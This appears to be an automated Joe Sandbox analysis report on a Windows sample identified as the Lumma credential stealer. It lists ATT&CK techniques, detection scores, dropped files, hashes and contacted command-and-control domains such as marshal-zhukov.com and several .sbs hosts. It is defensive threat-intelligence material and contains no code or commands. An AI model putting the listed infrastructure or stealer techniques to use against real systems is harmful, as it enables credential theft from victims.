    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
    Deobfuscate/Decode Files or Information
    Security Account Manager1
    Virtualization/Sandbox Evasion
    SMB/Windows Admin Shares2
    Clipboard Data
    3
    Non-Application Layer Protocol
    Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook3
    Obfuscated Files or Information
    NTDS1
    File and Directory Discovery
    Distributed Component Object ModelInput Capture114
    Application Layer Protocol
    Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
    DLL Side-Loading
    LSA Secrets33
    System Information Discovery
    SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    ceFgl3jkkk.exe45%ReversingLabsWin32.Spyware.Lummastealer
    ceFgl3jkkk.exe100%AviraTR/AVI.Lumma.hwuxs
    ceFgl3jkkk.exe100%Joe Sandbox ML
    SourceDetectionScannerLabelLink
    C:\Users\user\AppData\Local\Temp\_MEI8242\VCRUNTIME140.dll0%ReversingLabs
    C:\Users\user\AppData\Local\Temp\_MEI8242\_asyncio.pyd0%ReversingLabs
    C:\Users\user\AppData\Local\Temp\_MEI8242\_bz2.pyd0%ReversingLabs
    C:\Users\user\AppData\Local\Temp\_MEI8242\_ctypes.pyd0%ReversingLabs
    C:\Users\user\AppData\Local\Temp\_MEI8242\_decimal.pyd0%ReversingLabs
    C:\Users\user\AppData\Local\Temp\_MEI8242\_hashlib.pyd0%ReversingLabs
    C:\Users\user\AppData\Local\Temp\_MEI8242\_lzma.pyd0%ReversingLabs
    C:\Users\user\AppData\Local\Temp\_MEI8242\_multiprocessing.pyd0%ReversingLabs
    C:\Users\user\AppData\Local\Temp\_MEI8242\_overlapped.pyd0%ReversingLabs
    C:\Users\user\AppData\Local\Temp\_MEI8242\_queue.pyd0%ReversingLabs
    C:\Users\user\AppData\Local\Temp\_MEI8242\_socket.pyd0%ReversingLabs
    C:\Users\user\AppData\Local\Temp\_MEI8242\_ssl.pyd0%ReversingLabs
    C:\Users\user\AppData\Local\Temp\_MEI8242\_uuid.pyd0%ReversingLabs
    C:\Users\user\AppData\Local\Temp\_MEI8242\libcrypto-1_1.dll0%ReversingLabs
    C:\Users\user\AppData\Local\Temp\_MEI8242\libffi-7.dll0%ReversingLabs
    C:\Users\user\AppData\Local\Temp\_MEI8242\libssl-1_1.dll0%ReversingLabs
    C:\Users\user\AppData\Local\Temp\_MEI8242\pyexpat.pyd0%ReversingLabs
    C:\Users\user\AppData\Local\Temp\_MEI8242\python39.dll0%ReversingLabs
    C:\Users\user\AppData\Local\Temp\_MEI8242\select.pyd0%ReversingLabs
    C:\Users\user\AppData\Local\Temp\_MEI8242\unicodedata.pyd0%ReversingLabs
    No Antivirus matches
    No Antivirus matches
    SourceDetectionScannerLabelLink
    https://community.fastly.steamstatic.co0%Avira URL Cloudsafe
    https://community.fastly.steamstati0%Avira URL Cloudsafe
    https://marshal-zhukov.com/api)100%Avira URL Cloudmalware
    https://auscitte.github.io/systems%20blog/Exception-Directory-pefile#implementation-details0%Avira URL Cloudsafe
    https://www.ntcore.com/files/richsign.htm0%Avira URL Cloudsafe
    https://marshal-zhukov.com/apis100%Avira URL Cloudmalware
    droppyrelivei.cfd100%Avira URL Cloudmalware
    NameIPActiveMaliciousAntivirus DetectionReputation
    steamcommunity.com
    104.102.49.254
    truefalse
      high
      s-part-0017.t-0009.t-msedge.net
      13.107.246.45
      truefalse
        high
        marshal-zhukov.com
        188.114.97.3
        truefalse
          high
          droppyrelivei.cfd
          unknown
          unknowntrue
            unknown
            condifendteu.sbs
            unknown
            unknowntrue
              unknown
              allocatinow.sbs
              unknown
              unknowntrue
                unknown
                vennurviot.sbs
                unknown
                unknowntrue
                  unknown
                  drawwyobstacw.sbs
                  unknown
                  unknowntrue
                    unknown
                    mathcucom.sbs
                    unknown
                    unknowntrue
                      unknown
                      ehticsprocw.sbs
                      unknown
                      unknowntrue
                        unknown
                        resinedyw.sbs
                        unknown
                        unknowntrue
                          unknown
                          enlargkiw.sbs
                          unknown
                          unknowntrue
                            unknown
                            NameMaliciousAntivirus DetectionReputation
                            droppyrelivei.cfdtrue
                            • Avira URL Cloud: malware
                            unknown
                            https://steamcommunity.com/profiles/76561199724331900false
                              high
                              resinedyw.sbsfalse
                                high
                                enlargkiw.sbsfalse
                                  high
                                  allocatinow.sbsfalse
                                    high
                                    drawwyobstacw.sbsfalse
                                      high
                                      vennurviot.sbsfalse
                                        high
                                        ehticsprocw.sbsfalse
                                          high
                                          mathcucom.sbsfalse
                                            high
                                            condifendteu.sbsfalse
                                              high
                                              https://marshal-zhukov.com/apifalse
                                                high
                                                NameSourceMaliciousAntivirus DetectionReputation
                                                https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688ceFgl3jkkk.exe, 00000002.00000003.1505286993.0000000000D83000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000002.00000002.1547815675.0000000002B20000.00000004.00001000.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000002.00000003.1505501911.0000000000D86000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  https://www.ntcore.com/files/richsign.htmceFgl3jkkk.exe, 00000002.00000003.1523747536.0000000003311000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000002.00000003.1523600484.00000000032E3000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000002.00000002.1548099724.00000000031F0000.00000004.00001000.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000002.00000003.1523686303.00000000032F0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://auscitte.github.io/systems%20blog/Exception-Directory-pefile#implementation-detailsceFgl3jkkk.exe, 00000002.00000002.1548717939.0000000003430000.00000004.00001000.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000002.00000003.1523747536.0000000003311000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000002.00000003.1523600484.00000000032E3000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000002.00000003.1523686303.00000000032F0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://www.python.org/download/releases/2.3/mro/.ceFgl3jkkk.exe, 00000002.00000003.1506886633.0000000000D88000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000002.00000003.1506725417.0000000000D88000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000002.00000002.1547469415.0000000000F00000.00000004.00001000.00020000.00000000.sdmp, base_library.zip.0.drfalse
                                                    high
                                                    http://ocsp.thawte.com0ceFgl3jkkk.exe, 00000000.00000003.1499609486.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, libffi-7.dll.0.drfalse
                                                      high
                                                      http://store.steampowered.com/privacy_agreement/ngentask.exe, 00000003.00000002.1613155400.0000000001312000.00000004.00000020.00020000.00000000.sdmp, ngentask.exe, 00000003.00000002.1613429184.00000000013A8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/readerceFgl3jkkk.exe, 00000002.00000003.1505557465.0000000000D84000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000002.00000003.1505286993.0000000000D83000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000002.00000003.1505789755.0000000000D4C000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000002.00000003.1546530228.0000000000D4C000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000002.00000003.1505890825.0000000000D4D000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000002.00000002.1547030217.0000000000D4D000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000002.00000003.1505501911.0000000000D86000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000002.00000003.1546492928.0000000000D33000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          https://community.fastly.steamstatic.congentask.exe, 00000003.00000002.1613155400.0000000001312000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://marshal-zhukov.com/api)ngentask.exe, 00000003.00000002.1613322725.0000000001342000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: malware
                                                          unknown
                                                          https://www.python.org/dev/peps/pep-0205/ceFgl3jkkk.exe, 00000000.00000003.1503202450.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000002.00000002.1548042408.00000000031B0000.00000004.00001000.00020000.00000000.sdmp, base_library.zip.0.drfalse
                                                            high
                                                            http://store.steampowered.com/subscriber_agreement/ngentask.exe, 00000003.00000002.1613429184.00000000013A8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              high
                                                              https://python.org/dev/peps/pep-0263/python39.dll.0.drfalse
                                                                high
                                                                https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#ceFgl3jkkk.exe, 00000002.00000003.1505557465.0000000000D84000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000002.00000003.1505286993.0000000000D83000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000002.00000003.1505789755.0000000000D4C000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000002.00000003.1546530228.0000000000D4C000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000002.00000003.1505890825.0000000000D4D000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000002.00000002.1547030217.0000000000D4D000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000002.00000003.1505501911.0000000000D86000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000002.00000003.1546492928.0000000000D33000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://crl3.digiceFgl3jkkk.exe, 00000000.00000003.1498335139.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498125097.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1497059480.00000000006CD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?ngentask.exe, 00000003.00000002.1613155400.0000000001312000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_syceFgl3jkkk.exe, 00000002.00000003.1505557465.0000000000D84000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000002.00000003.1505286993.0000000000D83000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000002.00000003.1505789755.0000000000D4C000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000002.00000003.1546530228.0000000000D4C000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000002.00000003.1505890825.0000000000D4D000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000002.00000002.1547030217.0000000000D4D000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000002.00000003.1505501911.0000000000D86000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000002.00000003.1546492928.0000000000D33000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://marshal-zhukov.com/apisngentask.exe, 00000003.00000002.1613322725.0000000001347000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: malware
                                                                        unknown
                                                                        https://community.fastly.steamstatic.com/public/imngentask.exe, 00000003.00000002.1613155400.0000000001312000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://crl.thawte.com/ThawteTimestampingCA.crl0ceFgl3jkkk.exe, 00000000.00000003.1499609486.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, libffi-7.dll.0.drfalse
                                                                            high
                                                                            https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=idngentask.exe, 00000003.00000002.1613155400.0000000001312000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://www.openssl.org/HceFgl3jkkk.exe, 00000000.00000003.1499874700.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, libssl-1_1.dll.0.dr, libcrypto-1_1.dll.0.drfalse
                                                                                high
                                                                                https://marshal-zhukov.com/ngentask.exe, 00000003.00000002.1613155400.0000000001312000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://community.fastly.steamstatingentask.exe, 00000003.00000002.1613155400.0000000001312000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  http://store.steampowered.com/account/cookiepreferences/ngentask.exe, 00000003.00000002.1613429184.00000000013A8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://crl4.digiceceFgl3jkkk.exe, 00000000.00000003.1502556218.00000000006DA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://www.mandiant.com/resources/blog/tracking-malware-import-hashingceFgl3jkkk.exe, 00000002.00000002.1548717939.0000000003430000.00000004.00001000.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000002.00000003.1523747536.0000000003311000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000002.00000003.1523600484.00000000032E3000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000002.00000003.1523600484.00000000032B1000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000002.00000003.1523686303.00000000032F0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.pyceFgl3jkkk.exe, 00000002.00000003.1546492928.0000000000D33000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://store.steampowered.com/legal/ngentask.exe, 00000003.00000002.1613429184.00000000013A8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            • No. of IPs < 25%
                                                                                            • 25% < No. of IPs < 50%
                                                                                            • 50% < No. of IPs < 75%
                                                                                            • 75% < No. of IPs
                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                            188.114.97.3
                                                                                            marshal-zhukov.comEuropean Union
                                                                                            13335CLOUDFLARENETUSfalse
                                                                                            104.102.49.254
                                                                                            steamcommunity.comUnited States
                                                                                            16625AKAMAI-ASUSfalse
                                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                                            Analysis ID:1560168
                                                                                            Start date and time:2024-11-21 13:44:09 +01:00
                                                                                            Joe Sandbox product:CloudBasic
                                                                                            Overall analysis duration:0h 4m 49s
                                                                                            Hypervisor based Inspection enabled:false
                                                                                            Report type:full
                                                                                            Cookbook file name:default.jbs
                                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                            Number of analysed new started processes analysed:4
                                                                                            Number of new started drivers analysed:0
                                                                                            Number of existing processes analysed:0
                                                                                            Number of existing drivers analysed:0
                                                                                            Number of injected processes analysed:0
                                                                                            Technologies:
                                                                                            • HCA enabled
                                                                                            • EGA enabled
                                                                                            • AMSI enabled
                                                                                            Analysis Mode:default
                                                                                            Analysis stop reason:Timeout
                                                                                            Sample name:ceFgl3jkkk.exe
                                                                                            renamed because original name is a hash value
                                                                                            Original Sample Name:857270428d9d88c5da6d8b9d33059d4e29347637879a17975631408c5359b623.exe
                                                                                            Detection:MAL
                                                                                            Classification:mal100.troj.evad.winEXE@5/21@11/2
                                                                                            EGA Information:
                                                                                            • Successful, ratio: 100%
                                                                                            HCA Information:
                                                                                            • Successful, ratio: 98%
                                                                                            • Number of executed functions: 72
                                                                                            • Number of non-executed functions: 169
                                                                                            Cookbook Comments:
                                                                                            • Found application associated with file extension: .exe
                                                                                            • Stop behavior analysis, all processes terminated
                                                                                            • Exclude process from analysis (whitelisted): dllhost.exe
                                                                                            • Excluded IPs from analysis (whitelisted): 40.126.32.72, 40.126.32.133, 20.190.160.22, 40.126.32.134, 40.126.32.136, 20.190.160.17, 20.190.160.20, 40.126.32.76, 52.182.143.212
                                                                                            • Excluded domains from analysis (whitelisted): prdv4a.aadg.msidentity.com, slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, www.tm.v4.a.prd.aadg.trafficmanager.net, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, ocsp.digicert.com, onedsblobprdcus15.centralus.cloudapp.azure.com, login.live.com, blobcollector.events.data.trafficmanager.net, azureedge-t-prod.trafficmanager.net, umwatson.events.data.microsoft.com, www.tm.lg.prod.aadmsa.trafficmanager.net
                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                            • VT rate limit hit for: ceFgl3jkkk.exe
                                                                                            TimeTypeDescription
                                                                                            07:45:21API Interceptor7x Sleep call for process: ngentask.exe modified
                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            188.114.97.3RFQ 3100185 MAHAD.exeGet hashmaliciousFormBookBrowse
                                                                                            • www.rgenerousrs.store/o362/
                                                                                            A2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                                                            • www.beylikduzu616161.xyz/2nga/
                                                                                            Delivery_Notification_00000260791.doc.jsGet hashmaliciousUnknownBrowse
                                                                                            • radostdetym.ru/?ad=1JXSXybzEjjRJQDbVngTy7d8kEFAxmgmDN&id=rWoA9pTQhV1o4c5fjbOa-d26BGh3QU3-Bk0PqI4WnzM-5vl4IqKPymhrqkRpunF_PTHktMR-2qUlNAtnXA&rnd=45
                                                                                            ce.vbsGet hashmaliciousUnknownBrowse
                                                                                            • paste.ee/d/lxvbq
                                                                                            Label_00000852555.doc.jsGet hashmaliciousUnknownBrowse
                                                                                            • tamilandth.com/counter/?ad=1GNktTwWR98eDEMovFNDqyUPsyEdCxKRzC&id=LWkA9pJQhl9uXU1kaDN-eSC-55GNxzVDsLXZhtXL8Pr1j1FTCf4XAYGxA0VCjCQra2XwotFrDHGSYxM&rnd=25
                                                                                            PO 20495088.exeGet hashmaliciousFormBookBrowse
                                                                                            • www.ssrnoremt-rise.sbs/3jsc/
                                                                                            QUOTATION_NOVQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                            • filetransfer.io/data-package/zWkbOqX7/download
                                                                                            http://kklk16.bsyo45ksda.topGet hashmaliciousUnknownBrowse
                                                                                            • kklk16.bsyo45ksda.top/favicon.ico
                                                                                            gusetup.exeGet hashmaliciousUnknownBrowse
                                                                                            • www.glarysoft.com/update/glary-utilities/pro/pro50/
                                                                                            Online Interview Scheduling Form.lnkGet hashmaliciousDucktailBrowse
                                                                                            • gmtagency.online/api/check
                                                                                            104.102.49.254http://gtm-cn-j4g3qqvf603.steamproxy1.com/Get hashmaliciousUnknownBrowse
                                                                                            • www.valvesoftware.com/legal.htm
                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            marshal-zhukov.commodest-menu.exeGet hashmaliciousLummaCBrowse
                                                                                            • 188.114.97.3
                                                                                            file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                            • 188.114.97.3
                                                                                            n7ZKbApaa3.dllGet hashmaliciousLummaC, XmrigBrowse
                                                                                            • 188.114.97.3
                                                                                            JaDheaBFXI.exeGet hashmaliciousLummaCBrowse
                                                                                            • 188.114.96.3
                                                                                            ftoHy3FsuB.exeGet hashmaliciousLummaCBrowse
                                                                                            • 188.114.96.3
                                                                                            alarmer.exeGet hashmaliciousLummaCBrowse
                                                                                            • 188.114.96.3
                                                                                            nlJ2sNaZVi.exeGet hashmaliciousLummaCBrowse
                                                                                            • 188.114.96.3
                                                                                            Loader.exeGet hashmaliciousLummaCBrowse
                                                                                            • 188.114.97.3
                                                                                            file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                            • 188.114.97.3
                                                                                            file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                            • 188.114.96.3
                                                                                            s-part-0017.t-0009.t-msedge.netfile.exeGet hashmaliciousLummaCBrowse
                                                                                            • 13.107.246.45
                                                                                            file.exeGet hashmaliciousUnknownBrowse
                                                                                            • 13.107.246.45
                                                                                            file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                            • 13.107.246.45
                                                                                            Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                            • 13.107.246.45
                                                                                            APPENDIX FORM_N#U00b045013-20241120.com.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                            • 13.107.246.45
                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                            • 13.107.246.45
                                                                                            Payslip-21 November, 2024 ZmPQwjYq1NGSTsWga2.htmGet hashmaliciousBlackHacker JS ObfuscatorBrowse
                                                                                            • 13.107.246.45
                                                                                            phish_alert_sp2_2.0.0.0.emlGet hashmaliciousHTMLPhisherBrowse
                                                                                            • 13.107.246.45
                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                            • 13.107.246.45
                                                                                            CB1.exeGet hashmaliciousBlackMoonBrowse
                                                                                            • 13.107.246.45
                                                                                            steamcommunity.comaHPgKqtKWX.exeGet hashmaliciousLummaCBrowse
                                                                                            • 104.121.10.34
                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                            • 23.192.247.89
                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                            • 23.210.122.61
                                                                                            file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                            • 23.197.127.21
                                                                                            file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                            • 23.199.218.33
                                                                                            modest-menu.exeGet hashmaliciousLummaCBrowse
                                                                                            • 104.102.49.254
                                                                                            Setup.exeGet hashmaliciousLummaCBrowse
                                                                                            • 104.102.49.254
                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                            • 104.102.49.254
                                                                                            file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                            • 104.102.49.254
                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                            • 104.102.49.254
                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            CLOUDFLARENETUSUpdated Invoice_0755404645-2024_pdf.exeGet hashmaliciousUnknownBrowse
                                                                                            • 188.114.97.3
                                                                                            estimate Cost.pdfGet hashmaliciousUnknownBrowse
                                                                                            • 104.17.25.14
                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                            • 188.114.97.3
                                                                                            QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                            • 188.114.96.3
                                                                                            MV BBG MUARA Ship's Particulars.pdf.scr.exeGet hashmaliciousAgentTeslaBrowse
                                                                                            • 104.26.12.205
                                                                                            CONTRACT COPY PRN00720387_pdf.exeGet hashmaliciousGuLoaderBrowse
                                                                                            • 188.114.97.3
                                                                                            https://bitly.cx/aMW9O9Get hashmaliciousUnknownBrowse
                                                                                            • 188.114.96.3
                                                                                            file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                            • 188.114.96.3
                                                                                            Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                            • 188.114.97.3
                                                                                            PO-841122676_g787.exeGet hashmaliciousGuLoaderBrowse
                                                                                            • 188.114.97.3
                                                                                            AKAMAI-ASUSphish_alert_sp2_2.0.0.0.emlGet hashmaliciousHTMLPhisherBrowse
                                                                                            • 184.28.90.27
                                                                                            shell_php00.pdfGet hashmaliciousUnknownBrowse
                                                                                            • 104.126.112.182
                                                                                            96c27caf-3816-d26f-4af5-19e1d76e6c15.emlGet hashmaliciousHTMLPhisherBrowse
                                                                                            • 2.19.126.160
                                                                                            E89hSGjVrv.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                            • 23.57.90.101
                                                                                            Invoice PSI-3102.msgGet hashmaliciousUnknownBrowse
                                                                                            • 23.193.114.18
                                                                                            file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                            • 23.49.251.21
                                                                                            original.emlGet hashmaliciousUnknownBrowse
                                                                                            • 104.79.84.172
                                                                                            SBAFLA TeamCALL marcia.main__ (lo).msgGet hashmaliciousHTMLPhisherBrowse
                                                                                            • 2.19.126.160
                                                                                            file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                            • 23.200.88.30
                                                                                            aHPgKqtKWX.exeGet hashmaliciousLummaCBrowse
                                                                                            • 104.121.10.34
                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            a0e9f5d64349fb13191bc781f81f42e1file.exeGet hashmaliciousLummaCBrowse
                                                                                            • 188.114.97.3
                                                                                            • 104.102.49.254
                                                                                            file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                            • 188.114.97.3
                                                                                            • 104.102.49.254
                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                            • 188.114.97.3
                                                                                            • 104.102.49.254
                                                                                            MDE_File_Sample_37ce4d95fd579c36340b1d1490e2ef7623af4bb3.zipGet hashmaliciousLummaCBrowse
                                                                                            • 188.114.97.3
                                                                                            • 104.102.49.254
                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                            • 188.114.97.3
                                                                                            • 104.102.49.254
                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                            • 188.114.97.3
                                                                                            • 104.102.49.254
                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                            • 188.114.97.3
                                                                                            • 104.102.49.254
                                                                                            file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                            • 188.114.97.3
                                                                                            • 104.102.49.254
                                                                                            kXPgmYpAPg.docGet hashmaliciousUnknownBrowse
                                                                                            • 188.114.97.3
                                                                                            • 104.102.49.254
                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            C:\Users\user\AppData\Local\Temp\_MEI8242\_asyncio.pyd7b9HZNvZwL.exeGet hashmaliciousLummaCBrowse
                                                                                              CatalogApp.exeGet hashmaliciousLummaCBrowse
                                                                                                XS_Trade_AI-newest_release_.exeGet hashmaliciousLummaCBrowse
                                                                                                  bB0yJfzf0t.exeGet hashmaliciousLummaCBrowse
                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI8242\VCRUNTIME140.dll7b9HZNvZwL.exeGet hashmaliciousLummaCBrowse
                                                                                                      CatalogApp.exeGet hashmaliciousLummaCBrowse
                                                                                                        XS_Trade_AI-newest_release_.exeGet hashmaliciousLummaCBrowse
                                                                                                          bB0yJfzf0t.exeGet hashmaliciousLummaCBrowse
                                                                                                            https://downloads.linktek.com/LR/SetupLinkReporter.zipGet hashmaliciousUnknownBrowse
                                                                                                              cb1fcb3a3d30ed68e82b6b2a3499c4d07cf4c73ea4f67.exeGet hashmaliciousGo Injector, Stealc, VidarBrowse
                                                                                                                a3.cmdGet hashmaliciousUnknownBrowse
                                                                                                                  ELF2o7c93F.exeGet hashmaliciousUnknownBrowse
                                                                                                                    Process:C:\Users\user\Desktop\ceFgl3jkkk.exe
                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):76168
                                                                                                                    Entropy (8bit):6.763747567766442
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:1536:O6HuqvERNjBwySXtVaSvrgOFw9RxKMnMecbCIdFr:O6HZMRNjKySdLcOiHMecbCId
                                                                                                                    MD5:31CE620CB32AC950D31E019E67EFC638
                                                                                                                    SHA1:EAF02A203BC11D593A1ADB74C246F7A613E8EF09
                                                                                                                    SHA-256:1E0F8F7F13502F5CEE17232E9BEBCA7B44DD6EC29F1842BB61033044C65B2BBF
